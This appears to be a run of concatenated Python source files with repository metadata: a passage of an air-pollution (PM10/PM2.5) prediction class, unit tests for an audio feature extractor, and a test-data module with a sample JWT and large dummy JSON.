list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
##
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
for i in range(geo_column.shape[0]):
if i==geo_column.shape[0]:
geo_column=geo_column.iloc[i-1:i,:]
if df['station_name'][0] is geo_column.columns[i] and geo_column.iloc[i:i+1,i:i+1].iat[0,0] ==1:
geo_column=geo_column.iloc[i:i+1,:]
geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_PM10 = raw_data['PM10'].median()
self.data_PM10_std = np.std(raw_data['PM10'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['PM10'] = ((self.data_mean_PM10+ self.data_PM10_std) * self.reg.predict_proba(self.data)[:,1]
+ (self.data_mean_PM10- self.data_PM10_std) * self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
#reate the special class for PM2.5 polution that we are going to use from here on to predict new data
class polution_PM25_model():
def __init__(self, model_file, scaler_file):
# read the 'model' and 'scaler' files which were saved
with open('model_PM25','rb') as model_file, open('scaler', 'rb') as scaler_file:
self.reg = pickle.load(model_file)
self.scaler = pickle.load(scaler_file)
self.data = None
# take a data file (*.csv) and preprocess it in the same way as in the lectures
def load_and_clean_data(self, data_file):
# import the data
user_data = pd.read_csv(data_file,delimiter=',')
df=user_data
# store the data in a new variable for later use
self.df_with_predictions = df.copy()
df['date']=pd.to_datetime(df['date'])
#
list_months=[]
for i in range(df.shape[0]):
list_months.append(df['date'][i].month)
df['season'] = list_months
#
list_dayofweek=[]
for i in range(df.shape[0]):
list_dayofweek.append((df['date'][i].dayofweek)+1)
df['week_day'] = list_dayofweek
df=df.drop(['date'], axis=1)
#
factory_dencity = pd.read_csv('factory_dencity.csv')
columns_factory = ['season', 'industrial', 'electricity', 'processing', 'water_supply']
factory_dencity = factory_dencity[columns_factory]
#
df=df.merge(factory_dencity, on='season')
#
traffic_season_dencity=pd.read_csv('traffic_season_dencity.csv')
columns_traffic_season = ['season', 'season_traffic']
traffic_season_dencity = traffic_season_dencity[columns_traffic_season]
#
df=df.merge(traffic_season_dencity, on='season')
#
traffic_day_dencity=pd.read_csv('traffic_day_dencity.csv')
columns_traffic_day_dencity = ['time', 'week_day', 'traffic']
traffic_day_dencity = traffic_day_dencity[columns_traffic_day_dencity]
#
df=pd.merge(df,traffic_day_dencity,on=["time","week_day"],how="inner", sort=False)
#
df_inversion=pd.read_csv('df_inversion.csv')
columns_df_inversion = ['time', 'season', 'week_day', 'inversion_high200', 'inversion_high400', 'inversion_high600']
df_inversion = df_inversion[columns_df_inversion]
#
df=pd.merge(df,df_inversion,on=["season","week_day", 'time'],how="inner", sort=False)
df['inversion_high200']=df['inversion_high200'].mean()
df['inversion_high400']=df['inversion_high400'].mean()
df['inversion_high600']=df['inversion_high600'].mean()
df=df.iloc[:1,:]
#
wind253=pd.read_csv('wind253.csv')
columns_wind253 = ['time', 'season', 'week_day', '_V0_', '| V0 |']
wind253 = wind253[columns_wind253]
#
df=pd.merge(df,wind253,on=["season","week_day", 'time'],how="inner", sort=False)
df['_V0_']=df['_V0_'].mean()
df['| V0 |']=df['| V0 |'].mean()
df=df.iloc[:1,:]
#
building_density = pd.read_csv('building_density.csv')
columns_building_density = ['station_name', 'dencity_coef']
building_density = building_density[columns_building_density]
building_density.rename({'dencity_coef': 'building_dencity_coef'}, axis=1, inplace=True)
df=df.merge(building_density, on='station_name')
GeoStation=pd.DataFrame({'station_name': ['shabalovka', 'turistskaya',
'spiridonovka', 'proletarski', 'marino', 'koptevskii',
'glebovskaya', 'butlerova', 'anohina', 'ostankino' ]})
geo_column=pd.get_dummies(GeoStation['station_name'])
col=GeoStation['station_name'].values
geo_column=geo_column[col]
for i in range(geo_column.shape[0]):
if i==geo_column.shape[0]:
geo_column=geo_column.iloc[i-1:i,:]
if df['station_name'][0] is geo_column.columns[i] and geo_column.iloc[i:i+1,i:i+1].iat[0,0] ==1:
geo_column=geo_column.iloc[i:i+1,:]
geo_column.reset_index(drop=True, inplace=True)
df=pd.concat([df, geo_column], sort=False, axis=1)
df=df.drop(['station_name'], axis=1)
df=df.drop(['ostankino'], axis=1)
columns_df=['season', 'week_day', 'time', 'industrial', 'electricity',
'processing', 'water_supply', 'season_traffic', 'traffic',
'inversion_high200', 'inversion_high400', 'inversion_high600',
'_V0_', '| V0 |', 'building_dencity_coef', 'shabalovka',
'turistskaya', 'spiridonovka', 'proletarski', 'marino',
'koptevskii', 'glebovskaya', 'butlerova', 'anohina', '-T-', '| V |', '_V_', 'pressure', 'humidity',
'precipitation' ]
df=df[columns_df]
df=df.iloc[:1, :]
# we have included this line of code if you want to call the 'preprocessed data'
self.preprocessed_data = df.copy()
# we need this line so we can use it in the next functions
self.data = self.scaler.transform(df)
raw_data = pd.read_csv('prepared_Final_data.csv')
self.data_mean_PM25 = raw_data['PM2.5'].median()
self.data_PM25_std = np.std(raw_data['PM2.5'])
self.user_data = user_data
# a function which outputs the probability of a data point to be 1
def predicted_probability(self):
if (self.data is not None):
pred = self.reg.predict_proba(self.data)[:,1]
return pred
# predict the outputs and the probabilities and
# add columns with these values at the end of the new data
def predicted_outputs(self):
if (self.data is not None):
self.user_data['Probability'] = self.reg.predict_proba(self.data)[:,1]
self.user_data ['PM2.5'] = ((self.data_mean_PM25+ self.data_PM25_std) * self.reg.predict_proba(self.data)[:,1]
+(self.data_mean_PM25- self.data_PM25_std)* self.reg.predict_proba(self.data)[:,0:1])/2
return self.user_data
| 44.523353 | 133 | 0.569492 | 4,424 | 37,177 | 4.56736 | 0.063517 | 0.030486 | 0.017816 | 0.018806 | 0.905622 | 0.900723 | 0.895922 | 0.888647 | 0.884787 | 0.881471 | 0 | 0.020999 | 0.309573 | 37,177 | 834 | 134 | 44.576739 | 0.766207 | 0.134088 | 0 | 0.886831 | 0 | 0 | 0.17467 | 0.017785 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049383 | false | 0 | 0.012346 | 0 | 0.100823 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0c397509484560ec4b6b37513d3d068f6990fa7b | 7,823 | py | Python | tests/test_FeatureExtractor.py | thisisjl/DCASE2017-modified | 4755e712e3b53277120c142cc6c14f279cc396d4 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | tests/test_FeatureExtractor.py | thisisjl/DCASE2017-modified | 4755e712e3b53277120c142cc6c14f279cc396d4 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | tests/test_FeatureExtractor.py | thisisjl/DCASE2017-modified | 4755e712e3b53277120c142cc6c14f279cc396d4 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | """ Unit tests for FeatureExtractor """
import nose.tools
import sys
import numpy
sys.path.append('..')
from nose.tools import *
from dcase_framework.features import FeatureExtractor
from dcase_framework.utils import posix_path
import os
import tempfile
def test_extract():
# MFCC
extractor_name = 'mfcc'
feature_repository = FeatureExtractor(store=False).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_name=extractor_name,
extractor_params={
'mfcc': {
'n_mfcc': 12
}
}
)
nose.tools.eq_(len(feature_repository), 1)
nose.tools.assert_list_equal(sorted(list(feature_repository.keys())), [extractor_name])
# Meta
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['n_mfcc'], 12)
# Stat
nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N','S1', 'S2','mean', 'std'])
# Feat
# Shape
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)
# MFCC - delta
extractor_name = 'mfcc_delta'
feature_repository = FeatureExtractor(store=False).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_name=extractor_name,
extractor_params={
'mfcc': {
'n_mfcc': 12
}
}
)
nose.tools.eq_(len(feature_repository), 1)
nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])
# Meta
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_method'], 'mfcc')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_parameters']['n_mfcc'], 12)
# Stat
nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())),['N', 'S1', 'S2', 'mean', 'std'])
# Feat
# Shape
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)
# MFCC - acceleration
extractor_name = 'mfcc_acceleration'
feature_repository = FeatureExtractor(store=False).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_name=extractor_name,
extractor_params={
'mfcc': {
'n_mfcc': 12
}
}
)
nose.tools.eq_(len(feature_repository), 1)
nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])
# Meta
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_method'], 'mfcc')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['dependency_parameters']['n_mfcc'], 12)
# Stat
nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])
# Feat
# Shape
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)
# MEL
extractor_name = 'mel'
feature_repository = FeatureExtractor(store=False).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_name=extractor_name,
extractor_params={
'mel': {
'n_mels': 10
}
}
)
nose.tools.eq_(len(feature_repository), 1)
nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])
# Meta
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['n_mels'], 10)
# Stat
nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])
# Feat
# Shape
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 10)
nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].shape[1], 10)
# MFCC
extractor_name = 'mfcc'
feature_repository = FeatureExtractor(store=False).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_params={
'mfcc': {
'n_mfcc': 12
}
}
)
nose.tools.eq_(len(feature_repository), 1)
nose.tools.assert_list_equal(list(feature_repository.keys()), [extractor_name])
# Meta
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].keys())), ['feat', 'meta', 'stat'])
nose.tools.eq_(posix_path(feature_repository[extractor_name]['meta']['audio_file']), 'material/test.wav')
nose.tools.eq_(feature_repository[extractor_name]['meta']['parameters']['n_mfcc'], 12)
# Stat
nose.tools.eq_(feature_repository[extractor_name].stat[0]['N'], 501)
nose.tools.assert_list_equal(sorted(list(feature_repository[extractor_name].stat[0].keys())), ['N', 'S1', 'S2', 'mean', 'std'])
# Feat
# Shape
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].feat[0].shape[1], 12)
nose.tools.eq_(feature_repository[extractor_name].shape[0], 501)
nose.tools.eq_(feature_repository[extractor_name].shape[1], 12)
def test_save():
extractor_name = 'mfcc'
feature_repository = FeatureExtractor(store=True, overwrite=True).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_name=extractor_name,
extractor_params={
'mfcc': {
'n_mfcc': 10
}
},
storage_paths={
'mfcc': os.path.join('material', 'test.mfcc.cpickle')
}
)
@raises(ValueError)
def test_wrong_extractor():
extractor_name = 'mf'
feature_repository = FeatureExtractor(store=False).extract(
audio_file=os.path.join('material', 'test.wav'),
extractor_name=extractor_name,
extractor_params={
'mfcc': {
'n_mfcc': 10
}
}
)
| 38.160976 | 131 | 0.670203 | 972 | 7,823 | 5.12963 | 0.075103 | 0.185118 | 0.245086 | 0.282792 | 0.913558 | 0.909146 | 0.909146 | 0.898115 | 0.898115 | 0.896911 | 0 | 0.022167 | 0.169628 | 7,823 | 204 | 132 | 38.348039 | 0.745382 | 0.023648 | 0 | 0.661972 | 0 | 0 | 0.09833 | 0.005521 | 0 | 0 | 0 | 0 | 0.105634 | 1 | 0.021127 | false | 0 | 0.056338 | 0 | 0.077465 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a771b62734b3fedcc8871b18d73caada634c4082 | 29,385 | py | Python | tests/data/dummy.py | AccelByte/justice-python-common-log | ae5cc8678bf5a32467d11381f891d5c33e6b7853 | [
"Apache-2.0"
] | null | null | null | tests/data/dummy.py | AccelByte/justice-python-common-log | ae5cc8678bf5a32467d11381f891d5c33e6b7853 | [
"Apache-2.0"
] | null | null | null | tests/data/dummy.py | AccelByte/justice-python-common-log | ae5cc8678bf5a32467d11381f891d5c33e6b7853 | [
"Apache-2.0"
] | null | null | null | # Copyright 2022 AccelByte Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
TEST_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJiYW5zIjpbXSwiY2xpZW50X2lkIjoiMDAwMDAwMDAwMDAwMCIsImNvdW50cnkiOiJJRCIsImRpc3BsYXlfbmFtZSI6InRlc3QiLCJleHAiOjE2MjM5OTU0NzgsImlhdCI6MTYyMjY3NTQwNiwiamZsZ3MiOjEsIm5hbWVzcGFjZSI6InRlc3QiLCJuYW1lc3BhY2Vfcm9sZXMiOlt7Im5hbWVzcGFjZSI6InRlc3QiLCJyb2xlSWQiOiIwMDAwMDAwMDAwMDAwMDAwMDAifSx7Im5hbWVzcGFjZSI6InRlc3QiLCJyb2xlSWQiOiIxMTExMTExMTExMTExMTExMTEifSx7Im5hbWVzcGFjZSI6ImFjY2VsYnl0ZSIsInJvbGVJZCI6IjIyMjIyMjIyMjIyMjIyMjIyMjIifSx7Im5hbWVzcGFjZSI6IioiLCJyb2xlSWQiOiIzMzMzMzMzMzMzMzMzMzMzMzMzIn1dLCJwZXJtaXNzaW9ucyI6W10sInJvbGVzIjpbIjAwMDAwMDAwMDAwMDAwMDAwMCIsIjExMTExMTExMTExMTExMTExMSIsIjIyMjIyMjIyMjIyMjIyMjIyMjIiLCIzMzMzMzMzMzMzMzMzMzMzMzMzIl0sInNjb3BlIjoiYWNjb3VudCB0ZXN0Iiwic3ViIjoiMTIzNDU2Nzg5MTAiLCJqdGkiOiIwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMCJ9.IAdBig0pdLbUBlBDBeYQzoORzREpW5XcwM1TkUR0J7Q"
TEST_CONTENT_TYPE = 'application/json'
TEST_INVALID_CONTENT_TYPE = 'application/javascript'
TEST_RESPONSE_BODY = b'{\n "x": [\n "2022-01-04T00:00:00Z",\n "2022-01-05T00:00:00Z",\n "2022-01-06T00:00:00Z",\n "2022-01-07T00:00:00Z",\n "2022-01-08T00:00:00Z",\n "2022-01-09T00:00:00Z",\n "2022-01-10T00:00:00Z",\n "2022-01-11T00:00:00Z"\n ],\n "y": [\n 3075,\n 2641,\n 1941,\n 3236,\n 1613,\n 1804,\n 2852,\n 121\n ]\n}'
TEST_RESPONSE_BODY_RESULT = '{"x":["2022-01-04T00:00:00Z","2022-01-05T00:00:00Z","2022-01-06T00:00:00Z","2022-01-07T00:00:00Z","2022-01-08T00:00:00Z","2022-01-09T00:00:00Z","2022-01-10T00:00:00Z","2022-01-11T00:00:00Z"],"y":[3075,2641,1941,3236,1613,1804,2852,121]}'
TEST_REQUEST_BODY = b'{\n "id":"connector--analytics_game_telemetry--dev--s3",\n "testing":true,\n "name":"game-telemetrydev"\n}'
TEST_REQUEST_BODY_RESULT = '{"id":"connector--analytics_game_telemetry--dev--s3","testing":true,"name":"game-telemetrydev"}'
TEST_LARGE_DATA = b'{"beyond":{"if":2129835697.5730796,"remove":1794436353,"food":false,"clean":[{"weight":true,"silence":["cross","replace",false,-499849023,false,"late",955174835,1842778758.5261354,false,915538733.8679276,{"newspaper":false,"say":244418524,"mysterious":false,"mother":false,"even":-646116108,"sound":-1208221145,"doubt":[-845874835.9017024,["tribe",false,"hide",false,[false,[true,[[true,{"have":false,"central":963242665,"manner":-1520269867.6617684,"wear":796206239,"fifth":[{"somewhere":[{"return":["bat",true,[27945117,[false,"calm",["two",{"ourselves":{"measure":-372132515.7172165,"silent":{"give":336996906.14272976,"pure":true,"task":true,"were":true,"hidden":["blue",[-1328794856,false,[394683803,-779500286.5659609,true,"pencil",{"dot":false,"which":{"owner":false,"light":-1608391762.9962125,"composition":{"inch":"cage","learn":[{"else":{"dug":-330868370.1722536,"not":[60445955.203523636,"command",false,{"let":[false,"heavy",2110409060,[[{"through":1927039625.0686312,"count":"birthday","minerals":{"appearance":1497453832,"look":{"mouse":{"divide":[true,true,"biggest",1372026453,{"instead":{"canal":["mixture","just",false,false,"flag",true,{"gold":false,"bound":"captured","government":{"pleasure":{"park":true,"clay":"nervous","attack":"few","cost":"am","out":true,"thread":[["making",{"oldest":"similar","kept":{"not":[-1158199226,true,true,[false,-2048675764,{"material":"spread","to":{"congress":{"consider":-1437423742.0975595,"pot":true,"few":{"date":{"pet":{"west":"growth","give":-1691404955,"negative":false,"result":"wife","lie":{"one":false,"cast":[true,1275938924,-1136879911.273982,217406388,{"feature":136157952.27465868,"tiny":["eat",{"uncle":[true,["wave","therefore",12168483.271469593,false,44472354.64633131,true,"motor",false,{"doing":[["drive",-624569149,false,[["song",false,"dug",[[[false,"paid",[{"dozen":{"still":"hill","mud":1767126105,"knew":["atomic",true,["daughter","noon","finger",false,["force",[-1872931000,"hard",true,[1080538941,"queen",{"finish":"would","they":"bee","proud":{"western":false,"struggle":-1953936283,"higher":{"giving":{"herd":true,"wherever":840864885.4918156,"airplane":{"monkey":198354822,"rocket":-2058970024,"meet":"separate","quarter":{"correctly":-2013713226.8475766,"coal":{"running":[["is",[true,true,783894877.0924335,{"fear":{"mysterious":{"its":[[[false,"hair","differ",-287840297.4288955,"writer","than","felt",false,899090744.0876045,-797703863.7439446,"machinery",true,"happened","popular",false,false,"front",true,false,"income"],1174145877,true,-1787058932,166736953.48384094,false,1055933509.3530307,"important",-607722463.2608457,1650661337.0898137,"recall",false,"either","position","thank","different",true,-1735299999,true,-56149986.62072086],381027003,"post",true,true,"interest","ten",true,false,387939792,"sell",1093486116,729978952.3640637,"silent",true,false,true,-1735669592.5094166,1831177259,"recall"],"key":"truth","type":1049824873.3636742,"yet":1507673434,"strength":254901664,"bottle":1486553428,"army":"unless","bring":false,"jet":false,"needed":"take","deer":"birth","swam":801817069,"active":true,"brought":"future","gift":"ring","should":-2034265638.896184,"potatoes":-516196722,"blind":"cotton","memory":"ability","notice":true},"high":true,"idea":"rubbed","private":1927401693.5995932,"follow":447512187.3036394,"brush":"research","am":true,"chosen":"monkey","dog":"chosen","opposite":false,"might":true,"pair":"sense","flat":true,"hurt":"shelter","physical":1069851933.5764289,"natural":-1287169612.4078636,"truth":false,"breath":true,"charge":"meet","office":false},"clear":true,"highest":"unknown","family":-343283092.8539982,"physical":452896678,"balloon":false,"teeth":"that","equipment":true,"birds":-1695411777.2602134,"farm":802762490,"whole":true,"raise":1584347800.218967,"dead":-1093711500,"fresh":1987742063,"everyone":1126650957,"difference":1660149276,"please":1655707846.331164,"program":-1300396028,"pie":true,"tent":"slight"},false,"railroad",false,-1954071922.8468995,"blood","product","might","guess","habit",false,-1543894746,true,false,true,-1612319639,true],"border",true,1747493845.586399,-1769807196.3550725,"aid",false,"gone",true,"wave","sky",1382754008.2223487,"exercise",-1936157055.9483376,"choose",false,"real",-19886635,true],-1519034308,true,false,"depth",1138545813.1192842,"world",false,"south",-1238699455,"contrast",false,-2130379884.3977532,false,-1146779480.9603496,false,false,false,-811754493.7324934,621309736.0268555],"beside":1796768318,"brother":false,"plenty":false,"become":-1916886481,"parts":"nearer","wagon":false,"quickly":-780770116,"furniture":"window","railroad":"stood","universe":"review","quick":1265574859.0069265,"yesterday":false,"brush":430053894.42572165,"play":"became","finger":884619633.5356283,"satisfied":true,"produce":"exercise","worth":-423679789,"lack":-799792586.9356813},"noted":-631737229.8779964,"globe":"air","order":false,"copy":-1318995917,"at":false,"table":-48856287.78857899,"willing":2071508389.714118,"structure":"ship","winter":-2051748968.5781221,"six":"by","one":"rocky","facing":false,"orbit":"stage","actual":"fact","amount":1006834361,"thirty":"settle","happily":true},"shot":1711747945,"condition":false,"safe":true,"hurt":1274839043,"actual":true,"thin":"weight","house":-1687449646.1661205,"seed":"stove","burn":"free","river":false,"wrapped":101021638,"bread":738369879.0745091,"east":-787925402.3702745,"seldom":"ourselves","cloth":"represent","ride":false},"dream":1320470285,"climb":"down","obtain":"instrument","taken":1101622665.0513973,"still":"distance","sick":-1898907332,"suit":-1578218110.7565722,"smoke":"nor","food":"flow","facing":-84155668,"claws":-1973709649.370142,"twice":true,"motion":"everybody","conversation":829995096.5686278,"rush":"brave","began":true,"industrial":"tales"},"slipped":"express","stage":"cotton","burn":false,"clothes":1098869462.520844,"limited":"plural","whatever":"herd","pack":false,"mail":"stairs","plain":-1352285619,"silence":"door","nose":"halfway","settlers":false,"upon":1750606709,"child":"adjective","meat":1295864979.2971945,"hit":"load","doctor":-1561339823,"ask":true,"he":"common"},"selection":"slabs","never":-600607603,"glass":-908202749.3040614,"tool":false,"cutting":"stream","swam":true,"graph":"few","local":true,"whatever":true,"below":-989213528,"catch":false,"enjoy":"being","crowd":true,"promised":false,"at":-704118982.164917,"properly":1507440079.860363},"together":true,"division":"funny","private":-392272974,"lake":"rhyme","beyond":false,"compound":186043150.12913942,"date":"children","damage":"nearly","particularly":"wall","tropical":"age","tried":false,"leaf":"foot","somehow":true,"name":729537077.9729562,"left":-2090773707,"move":"right","method":true},false,-130590695.90715075,2349024,"never","wonder",2092550687,"ancient","military",false,"care",-1429304484,false,false,true,"collect",2130984134.1470447,1169158198],false,false,"many",-1843552333.330696,"fierce","white",-1420754004.0557528,-2008297409,"own",-1854116686.7720723,-1767943155,-1710684735.0563602,191968179,"at","occur",-1903126884.3334684],true,"sight",1664806633.9433074,"queen",true,"tears",550540971,"answer",-1786952806.2961583,false,true,"minute",true,"firm",true,"play",false,"page"],"nodded",true,false,false,-400275696.39848757,false,true,"grandfather",true,1201805460.493123,-852255891.5663724,true,"smile",-1987481108.553391,"guide"],"generally",true,false,true,-1865767483.9188848,"secret","soon",true,-914794357,false,"happy","play",-373509599.16906404,"fourth","bad",false,"specific"],"relationship":"space","one":"television","needs":1716182871,"against":true,"prove":-832994665,"carbon":"strike","near":"wore","could":"thousand","height":"driven","pull":false,"trade":false,"signal":2020175719,"fourth":1921728002,"black":true,"travel":"chose","station":true,"children":-509970994},"wonder":"tower","bent":false,"sing":-1134253041,"band":true,"fairly":true,"bat":1156586640.0220146,"balance":false,"silly":false,"copy":-851794698,"gradually":-524917515,"effect":false,"brick":"different","respect":false,"electricity":false,"stock":false,"prize":-784608456.674727,"move":false,"lie":true,"beginning":false},"carefully","table","famous",-774737921,false,true,true,1702716052.4939494,439206179.5006957,1475981631,true,"course","torn","musical","tobacco",false,"pack","spider","bread"],"between",true,true,"situation",true,1500742566.9625635,true,true,"stood",-162320723,-1507117232,-634421503.174295,548830139,"independent",-841361415,-150677849,false],"protection",1297263299.7442217,"mass",false,"balloon",false,true,"drew",true,"run",-534625814,"willing","outside",true,"certainly",true,-839893671.0998306,false,"cap"],1508391079.6116104,"effort",-1476003519,2124826272.6451883,-1775873940,-1566250611.0590677,240936079,false,"plenty","similar","hello",false,-703626630.7107,"blanket",-1593612362.3064518,false,-1615194724.7489605,"century","dog"],true,-315934274,4391550.609623909,374192753.7703824,false,false,"fire",264290219,true,true,-645446302.0169816,"morning","giant",602438923.7565851,false,"winter"],true,false,-2001615518,"forest",-882607001.1451616,-58894120,false,610126110.4988613,1735624262,"faster","pocket",true,"pain",-1213738916,118192864,true,"wonder","musical",true],false,-1641937516.1508512,"rather","thee",665277805.2117853,true,-816532895.3171797,true,354642474.8931198,true,-1821509046,"apart",-1056827913,false,"mad","cast"],false,1233678345,false,false,false,"serve","curve",true,"she",true,true,980316185.7327733,true,false,false,false,true,"claws","car"],"brought":"still","camera":2078645226.6381855,"complete":"herd","roar":-734845028,"source":"news","wherever":true,"merely":1295983269.1350121,"brick":68839038.13307238,"lonely":294952140,"fellow":"current","will":2089116877.1146312,"s